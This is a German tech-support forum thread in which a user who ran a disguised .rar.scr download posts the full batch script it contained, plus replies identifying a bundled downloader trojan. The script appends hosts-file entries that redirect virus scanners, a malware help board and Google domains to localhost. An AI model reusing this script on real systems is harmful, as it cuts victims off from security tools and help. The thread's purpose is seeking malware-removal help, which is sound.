Hi hab folgendes problem:

wollte mir vorher ein album runterladen, hab aber nicht bemerkt, dass die endung der datei name.rar.scr ist. so draufgeklickt virenmeldung bekommen... klasse was machst jetzt hab ich mal geschaut regedit geht noch taskmanager auch also denk ich mal das es ned so schlimm sein wird. so jetzt hab ich mir meine datei näher angeschaut und bin drauf gekommen das genau zwei dateien drin sind eine antikinder.bat datei die wie folgt lautet:

echo 127.0.0.1 www.virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.ch >> %systemroot%\system32\drivers\etc\hosts

da hab ich jetzt einfach die hosts datei aus dem ordner gelöscht, weil bei mir google nich mehr ging jetzt funktionierts wieder. jetzt war da noch ne 123.exe mit drin ich würd nur gern wissen ob die einer checken kann was se genau macht und was ich dann alles dagegen tun muss. das wär echt spitze.
ich lad die datei gleich hoch ich werde den link dann auf anfrage schicken möchte hier ja keinen virus oder sonst was verteilen.

danke schon mal
gruß pepe

Zitat:

wollte mir voher ein album runterladen, hab aber nicht bemerkt, dass die endung der datei name.rar.scr ist. so draufgeklickt virenmeldung bekommen...

Also wenn du dir von irgendeiner illegalen Warez Seite () ein Album runterlädst, wird dir wohl kaum einer helfen sorry!!!

Trotzdem hab ich mal Mitleid und gib dir diesen Link:

http://www.sophos.com/security/analy.../trojvbgx.html

Da siehste was 123.exe ist.

Gruß space

Sorry hier nochmal das gleiche in Deutsch:

Troj/VB-GX Trojaner (Trojan.Win32.VB.xt, Download.Trojan, TROJ_VB.DT) - Sophos Sicherheitsanalyse

woher weißte das ohne überhaupt die datei gesehen zu haben?

Zitat:

jetzt war da noch ne 123.exe mit drin ich würd nur gern wissen ob die einer checken kann was se genau macht

Genau das hab ich gemacht.

Zitat:

Troj/VB-GX ist ein Downloader-Trojaner für die Windows-Plattform, der versucht, eine ausführbare Datei mit dem Namen 123.exe von einem vordefinierten remoten Speicherort herunterzuladen.

Gruß space

ich hab dir die datei doch noch nicht mal geschickt??

jetzt bin ich verwirrt das kann ja sonst was für ne datei sein

Du hast gefragt jemand soll checken was die macht und auf

Troj/VB-GX Trojaner (Trojan.Win32.VB.xt, Download.Trojan, TROJ_VB.DT) - Sophos Sicherheitsanalyse

wirds dir doch ausführlich erklärt musst halt nur lesen

Gruß space